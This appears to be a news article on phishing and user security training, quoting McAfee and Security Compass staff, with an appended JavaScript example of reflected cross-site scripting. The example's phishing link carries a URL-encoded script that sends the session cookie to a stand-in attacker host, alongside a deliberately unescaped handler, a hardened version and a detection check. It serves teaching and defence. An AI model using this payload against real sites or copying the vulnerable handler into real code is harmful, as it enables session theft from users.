IT professionals may want to give their staff a refresher course on phishing attacks.
In a recent study, McAfee outlined the increasingly persuasive nature of phishing attacks and the psychological “mind games” that cyber criminals use to trick their prey. The study said scammers play on users’ emotions, using fear, greed and lust to ultimately steal personal and proprietary financial information. McAfee found that the key to an Internet scammer’s success is creating an illusion of legitimacy and familiarity.
“The technique we’ve seen the most is mimicking another organization’s e-mail,” Jean Pascal Hebert, an account manager at McAfee, said. “Typically these are the most successful types of attack and can entice an individual to release information they should not be releasing.”
Hebert said that more education is needed to combat these sophisticated attacks, but some security experts say this will take a major change in the training process to succeed.
Rohit Sethi, manager of Security Compass, said that most IT managers have failed to provide interactive training to their staff to help them understand the fundamentals of phishing attacks.
“A lot of times what you’ll have in an organization is an IT professional who understands the subject matter expertly, but they don’t have an understanding of how to train properly,” Sethi said. “So they’ll stand in front of their users and say – ‘don’t do this and don’t do that’ – and a lot of times users won’t pick up on it.”
Sethi said that traditional training strategies neglect to demonstrate how a user’s computer can be compromised and why the data leak occurs. He said that taking the time to develop this base understanding will allow users to apply their knowledge and adapt to future phishing attempts.
“A lot of companies will use a checklist approach, where you have somebody trained and, therefore, they can sign off and say that they’re trained,” Sethi said. “It follows policy, but they don’t really end up measuring the effectiveness of the training, so we’ll see a lot of [IT managers] frustrated with the effectiveness of their training and user awareness.”
Sahba Kazerooni, security consultant at Security Compass, sees most training policies as a substitute for competence, which in turn leaves users increasingly ill-equipped to recognize changing phishing attacks.
“A SANS Institute top 20 list of vulnerabilities that affect Internet security now has users listed as a threat for the first time,” Kazerooni said. “This has kind of led to the whole idea of phishing, all of a sudden, being a much bigger threat than it has been in previous years and users becoming a much bigger threat to IT security.”
Hebert agreed, saying that IT managers should take the time to develop internal campaigns to teach their users. He also said that implementing McAfee’s free SiteAdvisor tool, which flags potentially dangerous sites, is one of the first steps that companies should take to help “lock the front door.”
And while Hebert said users are not falling for e-mail spam as often as they used to, phishing sites which emulate corporate Web sites are often successful in tricking them.
“The first [phishing sites] we saw a few years ago were full of typos and bad art,” Hebert said. “But nowadays you see a complete mimic of corporate identities and the language it utilizes is often flawless.” Even more advanced, according to Sethi, are cross-site scripting techniques, which exploit holes in Web applications. A user can see a link that genuinely points at a legitimate Web site; however, because of a code vulnerability in that site, the link can carry script that the site reflects back into its own page, exposing users who follow it to a phishing attack under the legitimate site’s own domain.
For example, if this were done at an online bank, users could have their username, password and account information logged without suspicion. “This is the kind of area that is lacking in general user awareness training, so a lot of times people, even general security people, don’t know about cross-site scripting,” Sethi said.
Until better tools exist to defend against this type of attack, security experts say users should be cautious of long URLs because they may include a harmful script tag. The injected script is often URL-encoded, so it does not read as an obvious “<script>” in the link, and it could go unnoticed by even the most computer-savvy users.
“If you want to click on the link, copy and paste the link into your web browser and look at it,” Sethi said. “This may be verging on paranoia, but to be really sure you may want to try to go to the main site in question and get to the particular desired area manually.”
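As an added example, not taken from the article or from McAfee or Security Compass, the JavaScript below shows the mechanism Sethi describes and the check he recommends. It assumes a hypothetical bank at bank.example whose “page not found” handler reflects a `page` query parameter into its HTML without escaping; the same handler is then shown with output encoding, and a small function decodes a link (repeatedly, since attackers also double-encode) and flags the markers of injected script that a user pasting the URL into a browser is being asked to look for. The domains, the parameter name and the sample link are all constructed for this illustration.

```javascript
// Added example: reflected cross-site scripting as a phishing vector,
// and a URL check for links that carry injected script.
// bank.example, evil.example and the "page" parameter are constructed.

// Hypothetical vulnerable handler: echoes the requested page name
// straight into the HTML, so a crafted link becomes script on the
// bank's own domain.
function vulnerableNotFound(requestedPage) {
  return `<p>Sorry, the page ${requestedPage} was not found.</p>`;
}

// Minimal HTML output encoding for text placed inside an element body.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened handler: the same message, but the user-controlled value is
// encoded, so "<script>" is rendered as literal text and never executes.
function hardenedNotFound(requestedPage) {
  return `<p>Sorry, the page ${escapeHtml(requestedPage)} was not found.</p>`;
}

// Simulates the server: pull the "page" parameter out of a link the user
// followed and hand it to the given handler.
function renderFromLink(link, handler) {
  const page = new URL(link).searchParams.get('page') || '';
  return handler(page);
}

// Constructed phishing link: it really points at bank.example, but the
// "page" parameter is a URL-encoded script that sends the session cookie
// to an attacker-controlled host.
const phishingLink =
  'https://bank.example/notfound?page=' +
  '%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fevil.example%2F%3Fc%3D%27' +
  '%2Bdocument.cookie%3C%2Fscript%3E';

// The check a cautious user (or a mail gateway) can apply to a long URL:
// percent-decode until stable, then look for script markers.
function suspiciousUrl(rawUrl, maxDecodes = 3) {
  let decoded = rawUrl;
  for (let i = 0; i < maxDecodes; i++) {
    let next;
    try {
      next = decodeURIComponent(decoded);
    } catch (e) {
      break; // malformed escape sequence; stop decoding
    }
    if (next === decoded) break; // nothing left to decode
    decoded = next;
  }
  const markers = [
    /<\s*script/i,                              // injected script element
    /<\s*iframe/i,                              // injected frame
    /javascript\s*:/i,                          // javascript: URL in a link
    /on(error|load|click|mouseover|focus)\s*=/i, // inline event handler
    /document\.cookie/i,                        // session-theft payload
  ];
  const hits = markers.filter((re) => re.test(decoded)).map((re) => re.source);
  return { decoded, suspicious: hits.length > 0, hits };
}

// Stand-alone demonstration.
console.log('Vulnerable page renders:\n ', renderFromLink(phishingLink, vulnerableNotFound));
console.log('Hardened page renders:\n ', renderFromLink(phishingLink, hardenedNotFound));
console.log('URL check:', suspiciousUrl(phishingLink));
```

Run with `node`: the vulnerable handler returns a page containing a live `<script>` block that redirects the browser to evil.example with the cookie attached, while the hardened handler returns the same text as `&lt;script&gt;…`. The decoding loop is what makes the check useful against real links, since a single percent-encoded `%3Cscript%3E` never literally contains the string `<script>`; the marker list is a heuristic, not a complete XSS detector, and a false negative is still possible.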